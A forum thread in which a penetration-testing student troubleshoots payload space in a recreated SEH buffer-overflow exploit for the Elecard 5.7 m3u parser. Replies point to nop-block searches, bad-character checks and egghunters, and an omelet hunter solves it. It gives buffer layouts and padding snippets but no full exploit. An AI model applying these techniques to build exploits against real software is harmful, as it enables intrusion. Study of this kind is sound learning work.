Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: SEH Exploit and trouble with shellcode

Hybrid View

  1. #1
    Junior Member
    Join Date
    Jan 2010
    Posts
    35

    Default SEH Exploit and trouble with shellcode

    I am just wrapping up the PWB course and decided to practice on an SEH exploit. I took the Elecard 5.7 m3u exploit http://www.exploit-db.com/exploits/16253/ and tried recreating it under xpsp3 and vista using pvefindaddr (btw thanks for the great paper sickness). I was able to write my own exploit for both that pops up a calc, I used the nice jseh functionality of pvefindaddr for vista since everything but the exe is safeseh protected.

    I have had trouble trying to get any other payload to work since the space that seems available is only about 240 bytes, the exploit out there indicates there should be plenty of room for any shell code, I just can't seem to find it. I've got:

    junk (4bytes) + nseh + seh + nops(16) + shell(318 bytes) + rest (21000 bytes)

    In the debugger it just repeats this before and after my seh pointer until the end of the dump:
    junk + nseh + seh +nops + first 220 bytes of shell + 20-30 bytes of rest

    it just gets me stuck in a never ending loop. I've searched memory and can't find the rest of "rest". I did find about 100 bytes or so 700 - 800 bytes up from my seh pointer, which looks like this:

    100 bytes + junk (4bytes) + nseh + seh + nops(16) + + first 220 bytes of shell + 20-30 bytes of rest

    That's where that nasty loop starts. Can anyone give me any pointers on how I might get this working using a large payload (using one thats about 320 bytes)? Those 100 bytes woudl give me what I want, just not sure how to make use of them.

  2. #2
    Senior Member
    Join Date
    Jan 2010
    Posts
    140

    Default Re: SEH Exploit and trouble with shellcode

    I haven't tried this exploit but if you look through memory do you see any other areas that have an unbroken block of whatever character you are using to overflow the buffer? For example if you are using
    Code:
    rest = "\x90"*(21000)
    do you see anywhere in memory with 320 or more consecutive \x90 bytes?

    If so it may be possible to use some creative jumps to hit this space. Or possibly look into egghunters.

    This topic isn't really directly related to backtrack so your thread might get locked by one of the mods. Feel free to pm me if you want some help and I can try to find some time to play with this exploit.

  3. #3
    Junior Member pigtail23's Avatar
    Join Date
    Jun 2010
    Location
    black hole
    Posts
    41

    Default AW: SEH Exploit and trouble with shellcode

    have u tried exactly to inject like this:

    rest = "\x90"*(21000-len(header+junk+nseh+seh+nops+sc))

  4. #4
    Junior Member
    Join Date
    Jan 2010
    Posts
    35

    Default Re: SEH Exploit and trouble with shellcode

    Thanks.

    pigtail, I just tried that combination with the same results.

    Dudeman, I did search in memory and all I could find was 264 nops (close but no cigar) at the top of that repeating pattern that I was talking about. I'm new to egg hinters, and I looked into that, but couldn't find a spot that I could fit my shell code. I'll hit you up with a pm, not sure how to split my shell code up like that and still make it work.

  5. #5
    Senior Member
    Join Date
    Jan 2010
    Posts
    140

    Default Re: SEH Exploit and trouble with shellcode

    I responded via PM with some good links. Let me know how it goes.

  6. #6
    Junior Member pigtail23's Avatar
    Join Date
    Jun 2010
    Location
    black hole
    Posts
    41

    Default AW: SEH Exploit and trouble with shellcode

    have you checked your shellcode for badchars?

  7. #7
    Junior Member
    Join Date
    Jan 2010
    Posts
    35

    Default Re: SEH Exploit and trouble with shellcode

    Yep, but I don't think the bad chars isn't the problem it just gets cut off due to lack of space.

    Dudeman sent me some links from the corelan site that I am reading through right now....just from what I gathered from a brief read through it looks like I need to implement an omelet hunter but I need to play around with it a little first. Definitely learning a few things with what I though was going to be a simple seh exploit to recreate.

  8. #8
    Junior Member
    Join Date
    Jan 2010
    Posts
    35

    Default Re: SEH Exploit and trouble with shellcode

    Just to follow up, omlet hunter was the answer.......but not with-out a lot of trial and error. I actually had to modify the omlet hunter code to start it's search at the top of the current stack instead the bottom of the stack as it defaults to.

    Thanks again to dudeman for the pointers, tried to send you a pm, but private messages seem to be down. Was a great learning experience.....learned a lot of tricks with the debugger and some asm along the way.

  9. #9
    Senior Member
    Join Date
    Jan 2010
    Posts
    140

    Default Re: SEH Exploit and trouble with shellcode

    Happy to help. I actually tried to send you a pm today to see how it was going but I also saw that pm was down. I was wondering if it was just me but it looks like it isn't. If you don't mind I would like to see how the exploit turned out. I'll send you a pm when they start working again.

  10. #10
    Moderator
    Join Date
    Apr 2007
    Posts
    1,644

    Default Re: SEH Exploit and trouble with shellcode

    if you want to share the links or pointers, use the forum. its what its for. if you want to chat over pm, then there is no need for this thread

Page 1 of 2 12 LastLast

Similar Threads

  1. Trouble with awingsoft_web3d_bof exploit- please help!!
    By amulya in forum OLD Newbie Area
    Replies: 1
    Last Post: 11-29-2009, 12:27 PM
  2. English Shellcode
    By Gitsnik in forum OLD General IT Discussion
    Replies: 0
    Last Post: 11-24-2009, 04:01 AM
  3. Problems with shellcode
    By Seppel_S in forum OLD Pentesting
    Replies: 1
    Last Post: 10-30-2009, 02:19 PM
  4. Shellcode help- hex to opcode
    By Siph0n in forum OLD Tutorials and Guides
    Replies: 0
    Last Post: 05-26-2008, 06:25 PM
  5. shellcode help
    By godlike in forum OLD Newbie Area
    Replies: 1
    Last Post: 02-15-2008, 06:07 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •